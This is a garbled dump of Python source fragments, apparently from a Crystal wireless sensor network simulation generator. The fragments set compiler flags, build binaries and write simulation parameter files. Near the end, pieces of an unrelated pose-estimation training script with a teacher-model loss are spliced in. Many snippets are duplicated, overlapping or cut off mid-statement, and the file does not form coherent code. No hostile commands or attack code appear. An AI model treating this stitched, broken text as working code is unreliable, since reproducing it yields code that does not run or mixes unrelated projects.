num_senders, new_env) if nodemap != \"all\": copy(nodemap_txt, os.path.join(simdir, \"nodemap.txt\")) num_nodes =", "in tbl]) binary_name = \"crystal.sky\" def prepare_binary(simdir, nodes, num_epochs, concurrent_txs, new_env): env =", "all_nodes = set() with open(\"nodelist.txt\") as f: for l in f: l =", "p[\"sink\"] = sink p[\"n_tx_s\"] = n_tx_s p[\"n_tx_t\"] = n_tx_t p[\"n_tx_a\"] = n_tx_a p[\"dur_s\"]", "None: random.seed(seed) for _ in xrange(num_epochs): tbl += rnd_unique(nodes, concurrent_txs) return \"static const", "= testbed p[\"num_nodes\"] = num_nodes p[\"active_epochs\"] = active_epochs p[\"start_epoch\"] = start_epoch p[\"seed\"] =", "= cca.counter p[\"payload\"] = payload p[\"chmap\"] = chmap p[\"boot_chop\"] = boot_chop p[\"full_epochs\"] =", "\"-DDUR_T_MS=%d\"%dur_t, \"-DDUR_A_MS=%d\"%dur_a, \"-DCRYSTAL_SYNC_ACKS=%d\"%sync_ack, \"-DCRYSTAL_LONGSKIP=%d\"%longskip, \"-DCRYSTAL_PAYLOAD_LENGTH=%d\"%payload, \"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d\"%n_empty.r, \"-DCRYSTAL_MAX_SILENT_TAS=%d\"%n_empty.y, \"-DCRYSTAL_MAX_MISSING_ACKS=%d\"%n_empty.z, \"-DCRYSTAL_SINK_MAX_NOISY_TS=%d\"%n_empty.x, \"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty, \"-DCCA_THRESHOLD=%d\"%cca.dbm, \"-DCCA_COUNTER_THRESHOLD=%d\"%cca.counter, \"-DCHHOP_MAPPING=CHMAP_%s\"%chmap,", "src): for k,v in src.items(): if k not in dst: dst[k] = v", "= abs_bname + \".env\" with open(abs_tbl_name, \"w\") as f: f.write(generate_table_array(nodes, num_epochs, concurrent_txs)) pwd", "n_empty, cca, nodemap) in itertools.product(powers, channels, sinks, num_senderss, longskips, n_emptys, ccas, nodemaps): n_empty", "n_empty, cca) prepare_binary(simdir, all_senders, active_epochs, num_senders, new_env) if nodemap != \"all\": copy(nodemap_txt, os.path.join(simdir,", "longskip, payload, n_empty.r, n_empty.y, n_empty.z, n_empty.x, dyn_nempty, cca.dbm, cca.counter, full_epochs, testbed, nodemap, chmap,", "Exception(\"Sink node doesn't exist\") all_senders = [x for x in nodes if x!=sink]", "defaults) print \"using the following params\" print pars globals().update(pars) print \"--- Preparing simulations", "= n_empty.x p[\"nodemap\"] = nodemap p[\"cca\"] = cca.dbm p[\"cca_cnt\"] = cca.counter p[\"payload\"] =", "cflags += [\"-DCRYSTAL_START_DELAY_SINK=40\", \"-DCRYSTAL_START_DELAY_NONSINK=20\"] else: cflags += [\"-DCRYSTAL_START_DELAY_SINK=0\", \"-DCRYSTAL_START_DELAY_NONSINK=0\"] cflags = \" \".join(cflags)", "+= 1 return r def generate_table_array(nodes, num_epochs, concurrent_txs): tbl = [] if seed", "= n_empty.y p[\"n_empty.z\"] = n_empty.z p[\"n_empty.x\"] = n_empty.x p[\"nodemap\"] = nodemap p[\"cca\"] =", "n_empty.z, n_empty.x, dyn_nempty, cca.dbm, cca.counter, full_epochs, testbed, nodemap, chmap, boot_chop) if os.path.isdir(simdir): continue", "apppath = os.path.join(basepath, \"apps\", \"crystal\") sys.path += [\".\", os.path.join(basepath,\"test_tools\")] params = args.config def", "print \"--- Preparing simulations ------------------------\" all_nodes = set() with open(\"nodelist.txt\") as f: for", "\"all\": with open(nodemap_txt) as f: for l in f: l = l.strip() if", "k not in dst: dst[k] = v CcaTuple = namedtuple(\"CcaTuple\", \"dbm counter\") NemptyTuple", "n_empty.x p[\"nodemap\"] = nodemap p[\"cca\"] = cca.dbm p[\"cca_cnt\"] = cca.counter p[\"payload\"] = payload", "sink, num_senders, longskip, n_empty, cca, nodemap) in itertools.product(powers, channels, sinks, num_senderss, longskips, n_emptys,", "payload p[\"chmap\"] = chmap p[\"boot_chop\"] = boot_chop p[\"full_epochs\"] = full_epochs header = \"", "= \"crystal.sky\" def prepare_binary(simdir, nodes, num_epochs, concurrent_txs, new_env): env = os.environ.copy() env.update(new_env) abs_bname", "prepare_binary(simdir, nodes, num_epochs, concurrent_txs, new_env): env = os.environ.copy() env.update(new_env) abs_bname = os.path.join(apppath, binary_name)", "dst: dst[k] = v CcaTuple = namedtuple(\"CcaTuple\", \"dbm counter\") NemptyTuple = namedtuple(\"NemptyTuple\", \"r", "print e nodelist = os.path.join(simdir, \"nodelist.txt\") with open(nodelist, \"w\") as f: for n", "num_epochs, concurrent_txs, new_env): env = os.environ.copy() env.update(new_env) abs_bname = os.path.join(apppath, binary_name) abs_ihex_name =", "if k not in dst: dst[k] = v CcaTuple = namedtuple(\"CcaTuple\", \"dbm counter\")", "= dur_s p[\"dur_a\"] = dur_a p[\"dur_t\"] = dur_t p[\"sync_ack\"] = sync_ack p[\"longskip\"] =", "n_empty.y, n_empty.z, n_empty.x, dyn_nempty, cca.dbm, cca.counter, full_epochs, testbed, nodemap, chmap, boot_chop) if os.path.isdir(simdir):", "longskip, n_empty, cca) prepare_binary(simdir, all_senders, active_epochs, num_senders, new_env) if nodemap != \"all\": copy(nodemap_txt,", "= os.path.join(basepath, \"apps\", \"glossy-test\") #apppath = os.path.join(basepath, \"apps\", \"ta\") apppath = os.path.join(basepath, \"apps\",", "\"all\" and not os.path.exists(nodemap_txt): raise Exception(\"Node map file does not exist: \" +", "not in dst: dst[k] = v CcaTuple = namedtuple(\"CcaTuple\", \"dbm counter\") NemptyTuple =", "\"w\") as f: f.write(generate_table_array(nodes, num_epochs, concurrent_txs)) pwd = os.getcwd() os.chdir(apppath) subprocess.check_call([\"sh\",\"-c\",\"./build_simgen.sh\"], env=env) os.chdir(pwd)", "= sink p[\"n_tx_s\"] = n_tx_s p[\"n_tx_t\"] = n_tx_t p[\"n_tx_a\"] = n_tx_a p[\"dur_s\"] =", "nodemaps): n_empty = NemptyTuple(*n_empty) cca = CcaTuple(*cca) simdir = \"sink%03d_snd%02d_p%02d_c%02d_e%.2f_ns%02d_nt%02d_na%02d_ds%02d_dt%02d_da%02d_syna%d_ls%02d_pl%03d_r%02dy%02dz%02dx%02d_dyn%d_cca%d_%d_fe%02d_%s_%s_%s_B%s\"%(sink, num_senders, power, channel,", "seed p[\"power\"] = power p[\"channel\"] = channel p[\"period\"] = period p[\"senders\"] = num_senders", "cca.counter, full_epochs, testbed, nodemap, chmap, boot_chop) if os.path.isdir(simdir): continue try: nodemap_txt = nodemap+\".txt\"", "power, channel, period, n_tx_s, n_tx_t, n_tx_a, dur_s, dur_t, dur_a, sync_ack, longskip, payload, n_empty.r,", "channel, sink, num_senders, longskip, n_empty, cca, nodemap) in itertools.product(powers, channels, sinks, num_senderss, longskips,", "chmap p[\"boot_chop\"] = boot_chop p[\"full_epochs\"] = full_epochs header = \" \".join(p.keys()) values =", "cca.counter p[\"payload\"] = payload p[\"chmap\"] = chmap p[\"boot_chop\"] = boot_chop p[\"full_epochs\"] = full_epochs", "= start_epoch p[\"seed\"] = seed p[\"power\"] = power p[\"channel\"] = channel p[\"period\"] =", "\"apps\", \"ta\") apppath = os.path.join(basepath, \"apps\", \"crystal\") sys.path += [\".\", os.path.join(basepath,\"test_tools\")] params =", "namedtuple, OrderedDict from shutil import copy, rmtree import traceback import subprocess import itertools", "x in tbl]) binary_name = \"crystal.sky\" def prepare_binary(simdir, nodes, num_epochs, concurrent_txs, new_env): env", "\"-DCRYSTAL_PAYLOAD_LENGTH=%d\"%payload, \"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d\"%n_empty.r, \"-DCRYSTAL_MAX_SILENT_TAS=%d\"%n_empty.y, \"-DCRYSTAL_MAX_MISSING_ACKS=%d\"%n_empty.z, \"-DCRYSTAL_SINK_MAX_NOISY_TS=%d\"%n_empty.x, \"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty, \"-DCCA_THRESHOLD=%d\"%cca.dbm, \"-DCCA_COUNTER_THRESHOLD=%d\"%cca.counter, \"-DCHHOP_MAPPING=CHMAP_%s\"%chmap, \"-DBOOT_CHOPPING=BOOT_%s\"%boot_chop, \"-DN_FULL_EPOCHS=%d\"%full_epochs, ] if", "\".join(cflags) new_env = {\"CFLAGS\":cflags} return new_env glb = {} pars = {} execfile(params,", "= [x for x in nodes if x!=sink] new_env = mk_env(power, channel, sink,", "0)], \"nodemaps\":[\"all\"], \"ccas\":[(-32, 100)], \"payload\":2, #\"chmap\":\"nohop\", #\"boot_chop\":\"nohop\", \"logging\":True, \"seed\":None, } set_defaults(pars, defaults) print", "= {} pars = {} execfile(params, glb, pars) def set_defaults(dst, src): for k,v", "boot_chop p[\"full_epochs\"] = full_epochs header = \" \".join(p.keys()) values = \" \".join([str(x) for", "rnd_unique(nodes, concurrent_txs) return \"static const uint8_t sndtbl[] = {%s};\"%\",\".join([str(x) for x in tbl])", "= os.getcwd() os.chdir(apppath) subprocess.check_call([\"sh\",\"-c\",\"./build_simgen.sh\"], env=env) os.chdir(pwd) try: os.makedirs(simdir) except OSError,e: print e nodelist", "for l in f: l = l.strip() if l: all_nodes.add(int(l.strip())) simnum = 0", "doesn't exist\") all_senders = [x for x in nodes if x!=sink] new_env =", "pars) def set_defaults(dst, src): for k,v in src.items(): if k not in dst:", "new_env) if nodemap != \"all\": copy(nodemap_txt, os.path.join(simdir, \"nodemap.txt\")) num_nodes = len(all_senders) with open(os.path.join(simdir,", "concurrent_txs)) pwd = os.getcwd() os.chdir(apppath) subprocess.check_call([\"sh\",\"-c\",\"./build_simgen.sh\"], env=env) os.chdir(pwd) try: os.makedirs(simdir) except OSError,e: print", "p[\"channel\"] = channel p[\"period\"] = period p[\"senders\"] = num_senders p[\"sink\"] = sink p[\"n_tx_s\"]", "= n_tx_s p[\"n_tx_t\"] = n_tx_t p[\"n_tx_a\"] = n_tx_a p[\"dur_s\"] = dur_s p[\"dur_a\"] =", "glb, pars) def set_defaults(dst, src): for k,v in src.items(): if k not in", "if x not in r: r.append(x) l += 1 return r def generate_table_array(nodes,", "concurrent_txs): tbl = [] if seed is not None: random.seed(seed) for _ in", "num_senders, power, channel, period, n_tx_s, n_tx_t, n_tx_a, dur_s, dur_t, dur_a, sync_ack, longskip, payload,", "+= [\"-DCRYSTAL_START_DELAY_SINK=0\", \"-DCRYSTAL_START_DELAY_NONSINK=0\"] cflags = \" \".join(cflags) new_env = {\"CFLAGS\":cflags} return new_env glb", "p[\"payload\"] = payload p[\"chmap\"] = chmap p[\"boot_chop\"] = boot_chop p[\"full_epochs\"] = full_epochs header", "p[\"num_nodes\"] = num_nodes p[\"active_epochs\"] = active_epochs p[\"start_epoch\"] = start_epoch p[\"seed\"] = seed p[\"power\"]", "\"-DDUR_S_MS=%d\"%dur_s, \"-DDUR_T_MS=%d\"%dur_t, \"-DDUR_A_MS=%d\"%dur_a, \"-DCRYSTAL_SYNC_ACKS=%d\"%sync_ack, \"-DCRYSTAL_LONGSKIP=%d\"%longskip, \"-DCRYSTAL_PAYLOAD_LENGTH=%d\"%payload, \"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d\"%n_empty.r, \"-DCRYSTAL_MAX_SILENT_TAS=%d\"%n_empty.y, \"-DCRYSTAL_MAX_MISSING_ACKS=%d\"%n_empty.z, \"-DCRYSTAL_SINK_MAX_NOISY_TS=%d\"%n_empty.x, \"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty, \"-DCCA_THRESHOLD=%d\"%cca.dbm, \"-DCCA_COUNTER_THRESHOLD=%d\"%cca.counter,", "(power, channel, sink, num_senders, longskip, n_empty, cca, nodemap) in itertools.product(powers, channels, sinks, num_senderss,", "n_empty = NemptyTuple(*n_empty) cca = CcaTuple(*cca) simdir = \"sink%03d_snd%02d_p%02d_c%02d_e%.2f_ns%02d_nt%02d_na%02d_ds%02d_dt%02d_da%02d_syna%d_ls%02d_pl%03d_r%02dy%02dz%02dx%02d_dyn%d_cca%d_%d_fe%02d_%s_%s_%s_B%s\"%(sink, num_senders, power, channel, period,", "import itertools import re import random basepath = args.basepath #apppath = os.path.join(basepath, \"apps\",", "f.write(\"%d\\n\"%n) copy(abs_bname, simdir) copy(abs_ihex_name, simdir) copy(abs_env_name, simdir) copy(abs_tbl_name, simdir) def mk_env(power, channel, sink,", "python2.7 import sys import argparse import traceback ap = argparse.ArgumentParser(description='Simulation generator') ap.add_argument('--basepath', required=False,", "as f: for l in f: l = l.strip() if l: all_nodes.add(int(l.strip())) simnum", "power p[\"channel\"] = channel p[\"period\"] = period p[\"senders\"] = num_senders p[\"sink\"] = sink", "active_epochs p[\"start_epoch\"] = start_epoch p[\"seed\"] = seed p[\"power\"] = power p[\"channel\"] = channel", "= chmap p[\"boot_chop\"] = boot_chop p[\"full_epochs\"] = full_epochs header = \" \".join(p.keys()) values", "n_empty.z p[\"n_empty.x\"] = n_empty.x p[\"nodemap\"] = nodemap p[\"cca\"] = cca.dbm p[\"cca_cnt\"] = cca.counter", "cflags += [\"-DCRYSTAL_START_DELAY_SINK=0\", \"-DCRYSTAL_START_DELAY_NONSINK=0\"] cflags = \" \".join(cflags) new_env = {\"CFLAGS\":cflags} return new_env", "\"-DCRYSTAL_MAX_MISSING_ACKS=%d\"%n_empty.z, \"-DCRYSTAL_SINK_MAX_NOISY_TS=%d\"%n_empty.x, \"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty, \"-DCCA_THRESHOLD=%d\"%cca.dbm, \"-DCCA_COUNTER_THRESHOLD=%d\"%cca.counter, \"-DCHHOP_MAPPING=CHMAP_%s\"%chmap, \"-DBOOT_CHOPPING=BOOT_%s\"%boot_chop, \"-DN_FULL_EPOCHS=%d\"%full_epochs, ] if logging: cflags +=", "num_senders p[\"sink\"] = sink p[\"n_tx_s\"] = n_tx_s p[\"n_tx_t\"] = n_tx_t p[\"n_tx_a\"] = n_tx_a", "\"twist\"): cflags += [\"-DTINYOS_SERIAL_FRAMES=1\"] if testbed in (\"indriya\", \"fbk\", \"flock\", \"twist\"): cflags +=", "itertools.product(powers, channels, sinks, num_senderss, longskips, n_emptys, ccas, nodemaps): n_empty = NemptyTuple(*n_empty) cca =", "[] if seed is not None: random.seed(seed) for _ in xrange(num_epochs): tbl +=", "def prepare_binary(simdir, nodes, num_epochs, concurrent_txs, new_env): env = os.environ.copy() env.update(new_env) abs_bname = os.path.join(apppath,", "import subprocess import itertools import re import random basepath = args.basepath #apppath =", "for k,v in src.items(): if k not in dst: dst[k] = v CcaTuple", "sys import argparse import traceback ap = argparse.ArgumentParser(description='Simulation generator') ap.add_argument('--basepath', required=False, default=\"../..\", help='Base", "\"ta\") apppath = os.path.join(basepath, \"apps\", \"crystal\") sys.path += [\".\", os.path.join(basepath,\"test_tools\")] params = args.config", "subprocess import itertools import re import random basepath = args.basepath #apppath = os.path.join(basepath,", "p[\"nodemap\"] = nodemap p[\"cca\"] = cca.dbm p[\"cca_cnt\"] = cca.counter p[\"payload\"] = payload p[\"chmap\"]", "\"-DCRYSTAL_SINK_ID=%d\"%sink, \"-DSTART_EPOCH=%d\"%start_epoch, \"-DCONCURRENT_TXS=%d\"%num_senders, \"-DNUM_ACTIVE_EPOCHS=%d\"%active_epochs, \"-DCRYSTAL_CONF_PERIOD=%f\"%period, \"-DN_TX_S=%d\"%n_tx_s, \"-DN_TX_T=%d\"%n_tx_t, \"-DN_TX_A=%d\"%n_tx_a, \"-DDUR_S_MS=%d\"%dur_s, \"-DDUR_T_MS=%d\"%dur_t, \"-DDUR_A_MS=%d\"%dur_a, \"-DCRYSTAL_SYNC_ACKS=%d\"%sync_ack, \"-DCRYSTAL_LONGSKIP=%d\"%longskip,", "= os.path.join(simdir, \"nodelist.txt\") with open(nodelist, \"w\") as f: for n in nodes: f.write(\"%d\\n\"%n)", "os.path.join(basepath, \"apps\", \"ta\") apppath = os.path.join(basepath, \"apps\", \"crystal\") sys.path += [\".\", os.path.join(basepath,\"test_tools\")] params", "open(abs_tbl_name, \"w\") as f: f.write(generate_table_array(nodes, num_epochs, concurrent_txs)) pwd = os.getcwd() os.chdir(apppath) subprocess.check_call([\"sh\",\"-c\",\"./build_simgen.sh\"], env=env)", "in (\"indriya\", \"fbk\"): cflags += [\"-DCRYSTAL_START_DELAY_SINK=40\", \"-DCRYSTAL_START_DELAY_NONSINK=20\"] else: cflags += [\"-DCRYSTAL_START_DELAY_SINK=0\", \"-DCRYSTAL_START_DELAY_NONSINK=0\"] cflags", "n): l = 0 r = [] while (l<n): x = random.choice(nodes) if", "nodemap p[\"cca\"] = cca.dbm p[\"cca_cnt\"] = cca.counter p[\"payload\"] = payload p[\"chmap\"] = chmap", "sink, num_senders, longskip, n_empty, cca) prepare_binary(simdir, all_senders, active_epochs, num_senders, new_env) if nodemap !=", "binary_name) abs_ihex_name = abs_bname + \".ihex\" abs_tbl_name = os.path.join(apppath, \"sndtbl.c\") abs_env_name = abs_bname", "= abs_bname + \".ihex\" abs_tbl_name = os.path.join(apppath, \"sndtbl.c\") abs_env_name = abs_bname + \".env\"", "l.strip() if l: all_nodes.add(int(l.strip())) simnum = 0 for (power, channel, sink, num_senders, longskip,", "p[\"dur_s\"] = dur_s p[\"dur_a\"] = dur_a p[\"dur_t\"] = dur_t p[\"sync_ack\"] = sync_ack p[\"longskip\"]", "in f: l = l.strip() if l: all_nodes.add(int(l.strip())) simnum = 0 for (power,", "new_env = {\"CFLAGS\":cflags} return new_env glb = {} pars = {} execfile(params, glb,", "execfile(params, glb, pars) def set_defaults(dst, src): for k,v in src.items(): if k not", "cflags += [\"-DDISABLE_UART=1\"] if testbed in (\"indriya\", \"fbk\", \"twist\"): cflags += [\"-DTINYOS_SERIAL_FRAMES=1\"] if", "n_tx_s, n_tx_t, n_tx_a, dur_s, dur_t, dur_a, sync_ack, longskip, payload, n_empty.r, n_empty.y, n_empty.z, n_empty.x,", "abs_bname + \".ihex\" abs_tbl_name = os.path.join(apppath, \"sndtbl.c\") abs_env_name = abs_bname + \".env\" with", "for x in nodes if x!=sink] new_env = mk_env(power, channel, sink, num_senders, longskip,", "sink, num_senders, longskip, n_empty, cca): cflags = [ \"-DTX_POWER=%d\"%power, \"-DRF_CHANNEL=%d\"%channel, \"-DCRYSTAL_SINK_ID=%d\"%sink, \"-DSTART_EPOCH=%d\"%start_epoch, \"-DCONCURRENT_TXS=%d\"%num_senders,", "ap.add_argument('-c', '--config', required=False, default=\"params.py\", help='Configuration python file') args = ap.parse_args() import os from", "for (power, channel, sink, num_senders, longskip, n_empty, cca, nodemap) in itertools.product(powers, channels, sinks,", "required=False, default=\"params.py\", help='Configuration python file') args = ap.parse_args() import os from collections import", "\"apps\", \"crystal\") sys.path += [\".\", os.path.join(basepath,\"test_tools\")] params = args.config def rnd_unique(nodes, n): l", "rmtree import traceback import subprocess import itertools import re import random basepath =", "= set(all_nodes) if nodemap != \"all\": with open(nodemap_txt) as f: for l in", "counter\") NemptyTuple = namedtuple(\"NemptyTuple\", \"r y z x\") defaults = { \"period\":2, \"sync_ack\":1,", "\"seed\":None, } set_defaults(pars, defaults) print \"using the following params\" print pars globals().update(pars) print", "tbl = [] if seed is not None: random.seed(seed) for _ in xrange(num_epochs):", "= os.path.join(apppath, \"sndtbl.c\") abs_env_name = abs_bname + \".env\" with open(abs_tbl_name, \"w\") as f:", "raise Exception(\"Node map file does not exist: \" + nodemap_txt) nodes = set(all_nodes)", "abs_env_name = abs_bname + \".env\" with open(abs_tbl_name, \"w\") as f: f.write(generate_table_array(nodes, num_epochs, concurrent_txs))", "exist: \" + nodemap_txt) nodes = set(all_nodes) if nodemap != \"all\": with open(nodemap_txt)", "z x\") defaults = { \"period\":2, \"sync_ack\":1, \"dyn_nempty\":0, #\"n_emptys\":[(2, 2, 4, 0)], \"nodemaps\":[\"all\"],", "testbed p[\"num_nodes\"] = num_nodes p[\"active_epochs\"] = active_epochs p[\"start_epoch\"] = start_epoch p[\"seed\"] = seed", "+= [\"-DTINYOS_NODE_ID=1\"] if testbed == \"indriya\": cflags += [\"-DSHORT_LOGS=1\"] if testbed == \"cooja\":", "\" + nodemap_txt) nodes = set(all_nodes) if nodemap != \"all\": with open(nodemap_txt) as", "= channel p[\"period\"] = period p[\"senders\"] = num_senders p[\"sink\"] = sink p[\"n_tx_s\"] =", "nodemap_txt) nodes = set(all_nodes) if nodemap != \"all\": with open(nodemap_txt) as f: for", "tbl]) binary_name = \"crystal.sky\" def prepare_binary(simdir, nodes, num_epochs, concurrent_txs, new_env): env = os.environ.copy()", "= namedtuple(\"CcaTuple\", \"dbm counter\") NemptyTuple = namedtuple(\"NemptyTuple\", \"r y z x\") defaults =", "logging: cflags += [\"-DCRYSTAL_LOGGING=1\"] else: cflags += [\"-DDISABLE_UART=1\"] if testbed in (\"indriya\", \"fbk\",", "simulations ------------------------\" all_nodes = set() with open(\"nodelist.txt\") as f: for l in f:", "num_epochs, concurrent_txs)) pwd = os.getcwd() os.chdir(apppath) subprocess.check_call([\"sh\",\"-c\",\"./build_simgen.sh\"], env=env) os.chdir(pwd) try: os.makedirs(simdir) except OSError,e:", "nodemap != \"all\" and not os.path.exists(nodemap_txt): raise Exception(\"Node map file does not exist:", "ap.add_argument('--basepath', required=False, default=\"../..\", help='Base path') ap.add_argument('-c', '--config', required=False, default=\"params.py\", help='Configuration python file') args", "testbed in (\"indriya\", \"fbk\"): cflags += [\"-DCRYSTAL_START_DELAY_SINK=40\", \"-DCRYSTAL_START_DELAY_NONSINK=20\"] else: cflags += [\"-DCRYSTAL_START_DELAY_SINK=0\", \"-DCRYSTAL_START_DELAY_NONSINK=0\"]", "'--config', required=False, default=\"params.py\", help='Configuration python file') args = ap.parse_args() import os from collections", "map file does not exist: \" + nodemap_txt) nodes = set(all_nodes) if nodemap", "num_senders, longskip, n_empty, cca) prepare_binary(simdir, all_senders, active_epochs, num_senders, new_env) if nodemap != \"all\":", "\"w\") as f: p = OrderedDict() p[\"testbed\"] = testbed p[\"num_nodes\"] = num_nodes p[\"active_epochs\"]", "import re import random basepath = args.basepath #apppath = os.path.join(basepath, \"apps\", \"glossy-test\") #apppath", "l = l.strip() if l: all_nodes.add(int(l.strip())) simnum = 0 for (power, channel, sink,", "tbl += rnd_unique(nodes, concurrent_txs) return \"static const uint8_t sndtbl[] = {%s};\"%\",\".join([str(x) for x", "4, 0)], \"nodemaps\":[\"all\"], \"ccas\":[(-32, 100)], \"payload\":2, #\"chmap\":\"nohop\", #\"boot_chop\":\"nohop\", \"logging\":True, \"seed\":None, } set_defaults(pars, defaults)", "p[\"testbed\"] = testbed p[\"num_nodes\"] = num_nodes p[\"active_epochs\"] = active_epochs p[\"start_epoch\"] = start_epoch p[\"seed\"]", "l in f: l = l.strip() if l: all_nodes.add(int(l.strip())) simnum = 0 for", "import namedtuple, OrderedDict from shutil import copy, rmtree import traceback import subprocess import", "OSError,e: print e nodelist = os.path.join(simdir, \"nodelist.txt\") with open(nodelist, \"w\") as f: for", "pars globals().update(pars) print \"--- Preparing simulations ------------------------\" all_nodes = set() with open(\"nodelist.txt\") as", "import traceback ap = argparse.ArgumentParser(description='Simulation generator') ap.add_argument('--basepath', required=False, default=\"../..\", help='Base path') ap.add_argument('-c', '--config',", "path') ap.add_argument('-c', '--config', required=False, default=\"params.py\", help='Configuration python file') args = ap.parse_args() import os", "\"sndtbl.c\") abs_env_name = abs_bname + \".env\" with open(abs_tbl_name, \"w\") as f: f.write(generate_table_array(nodes, num_epochs,", "= n_tx_a p[\"dur_s\"] = dur_s p[\"dur_a\"] = dur_a p[\"dur_t\"] = dur_t p[\"sync_ack\"] =", "argparse.ArgumentParser(description='Simulation generator') ap.add_argument('--basepath', required=False, default=\"../..\", help='Base path') ap.add_argument('-c', '--config', required=False, default=\"params.py\", help='Configuration python", "+= [\"-DSHORT_LOGS=1\"] if testbed == \"cooja\": cflags += [\"-DCOOJA=1\"] if testbed in (\"indriya\",", "return r def generate_table_array(nodes, num_epochs, concurrent_txs): tbl = [] if seed is not", "boot_chop) if os.path.isdir(simdir): continue try: nodemap_txt = nodemap+\".txt\" if nodemap != \"all\" and", "\"-DCHHOP_MAPPING=CHMAP_%s\"%chmap, \"-DBOOT_CHOPPING=BOOT_%s\"%boot_chop, \"-DN_FULL_EPOCHS=%d\"%full_epochs, ] if logging: cflags += [\"-DCRYSTAL_LOGGING=1\"] else: cflags += [\"-DDISABLE_UART=1\"]", "copy(abs_tbl_name, simdir) def mk_env(power, channel, sink, num_senders, longskip, n_empty, cca): cflags = [", "#\"chmap\":\"nohop\", #\"boot_chop\":\"nohop\", \"logging\":True, \"seed\":None, } set_defaults(pars, defaults) print \"using the following params\" print", "f: for n in nodes: f.write(\"%d\\n\"%n) copy(abs_bname, simdir) copy(abs_ihex_name, simdir) copy(abs_env_name, simdir) copy(abs_tbl_name,", "nodes if x!=sink] new_env = mk_env(power, channel, sink, num_senders, longskip, n_empty, cca) prepare_binary(simdir,", "= n_tx_t p[\"n_tx_a\"] = n_tx_a p[\"dur_s\"] = dur_s p[\"dur_a\"] = dur_a p[\"dur_t\"] =", "dur_a p[\"dur_t\"] = dur_t p[\"sync_ack\"] = sync_ack p[\"longskip\"] = longskip p[\"n_empty\"] = n_empty.r", "except Exception, e: traceback.print_exc() if os.path.isdir(simdir): rmtree(simdir) raise e print \"%d simulation(s) generated\"%simnum", "basepath = args.basepath #apppath = os.path.join(basepath, \"apps\", \"glossy-test\") #apppath = os.path.join(basepath, \"apps\", \"ta\")", "p.values()]) f.write(header) f.write(\"\\n\") f.write(values) f.write(\"\\n\") simnum += 1 except Exception, e: traceback.print_exc() if", "simdir) copy(abs_tbl_name, simdir) def mk_env(power, channel, sink, num_senders, longskip, n_empty, cca): cflags =", "channel p[\"period\"] = period p[\"senders\"] = num_senders p[\"sink\"] = sink p[\"n_tx_s\"] = n_tx_s", "= NemptyTuple(*n_empty) cca = CcaTuple(*cca) simdir = \"sink%03d_snd%02d_p%02d_c%02d_e%.2f_ns%02d_nt%02d_na%02d_ds%02d_dt%02d_da%02d_syna%d_ls%02d_pl%03d_r%02dy%02dz%02dx%02d_dyn%d_cca%d_%d_fe%02d_%s_%s_%s_B%s\"%(sink, num_senders, power, channel, period, n_tx_s,", "testbed in (\"indriya\", \"fbk\", \"twist\"): cflags += [\"-DTINYOS_SERIAL_FRAMES=1\"] if testbed in (\"indriya\", \"fbk\",", "p[\"n_tx_s\"] = n_tx_s p[\"n_tx_t\"] = n_tx_t p[\"n_tx_a\"] = n_tx_a p[\"dur_s\"] = dur_s p[\"dur_a\"]", "copy(nodemap_txt, os.path.join(simdir, \"nodemap.txt\")) num_nodes = len(all_senders) with open(os.path.join(simdir, \"params_tbl.txt\"), \"w\") as f: p", "collections import namedtuple, OrderedDict from shutil import copy, rmtree import traceback import subprocess", "[\"-DSHORT_LOGS=1\"] if testbed == \"cooja\": cflags += [\"-DCOOJA=1\"] if testbed in (\"indriya\", \"fbk\"):", "cca): cflags = [ \"-DTX_POWER=%d\"%power, \"-DRF_CHANNEL=%d\"%channel, \"-DCRYSTAL_SINK_ID=%d\"%sink, \"-DSTART_EPOCH=%d\"%start_epoch, \"-DCONCURRENT_TXS=%d\"%num_senders, \"-DNUM_ACTIVE_EPOCHS=%d\"%active_epochs, \"-DCRYSTAL_CONF_PERIOD=%f\"%period, \"-DN_TX_S=%d\"%n_tx_s, \"-DN_TX_T=%d\"%n_tx_t,", "\" \".join([str(x) for x in p.values()]) f.write(header) f.write(\"\\n\") f.write(values) f.write(\"\\n\") simnum += 1", "nodemap != \"all\": copy(nodemap_txt, os.path.join(simdir, \"nodemap.txt\")) num_nodes = len(all_senders) with open(os.path.join(simdir, \"params_tbl.txt\"), \"w\")", "\"crystal.sky\" def prepare_binary(simdir, nodes, num_epochs, concurrent_txs, new_env): env = os.environ.copy() env.update(new_env) abs_bname =", "n_empty.x, dyn_nempty, cca.dbm, cca.counter, full_epochs, testbed, nodemap, chmap, boot_chop) if os.path.isdir(simdir): continue try:", "NemptyTuple = namedtuple(\"NemptyTuple\", \"r y z x\") defaults = { \"period\":2, \"sync_ack\":1, \"dyn_nempty\":0,", "dst[k] = v CcaTuple = namedtuple(\"CcaTuple\", \"dbm counter\") NemptyTuple = namedtuple(\"NemptyTuple\", \"r y", "os.path.join(simdir, \"nodemap.txt\")) num_nodes = len(all_senders) with open(os.path.join(simdir, \"params_tbl.txt\"), \"w\") as f: p =", "argparse import traceback ap = argparse.ArgumentParser(description='Simulation generator') ap.add_argument('--basepath', required=False, default=\"../..\", help='Base path') ap.add_argument('-c',", "if sink not in nodes: raise Exception(\"Sink node doesn't exist\") all_senders = [x", "abs_tbl_name = os.path.join(apppath, \"sndtbl.c\") abs_env_name = abs_bname + \".env\" with open(abs_tbl_name, \"w\") as" ]
[ "+= val * n self.count += n self.avg = self.sum / self.count if", "model, criterion, optimizer, epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter() data_time = AverageMeter()", "'.join(['| {:.3f}'.format(value) for value in values]) + ' |' ) class AverageMeter(object): \"\"\"Computes", "num_images, :, 2:3] = maxvals # double check this all_boxes parts all_boxes[idx:idx +", "print('=> The average inference time is :', time_gpu / len(val_loader)) name_values, perf_indicator =", "in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) outputs = model(input) target = target[0].cuda(non_blocking=True) target_hm =", "target, pred*4, outputs, prefix + '_clean') save_debug_images(config, tmp, copy.deepcopy(meta), target, pred*4, outputs, prefix)", "model_teacher(inputs[0]) loss_D_hm = criterion(D_output_detach, target, target_weight) loss_D_kd = criterion(D_output_detach, teacher_output, target_weight) loss_D =", "average inference time is :', time_gpu / len(val_loader)) name_values, 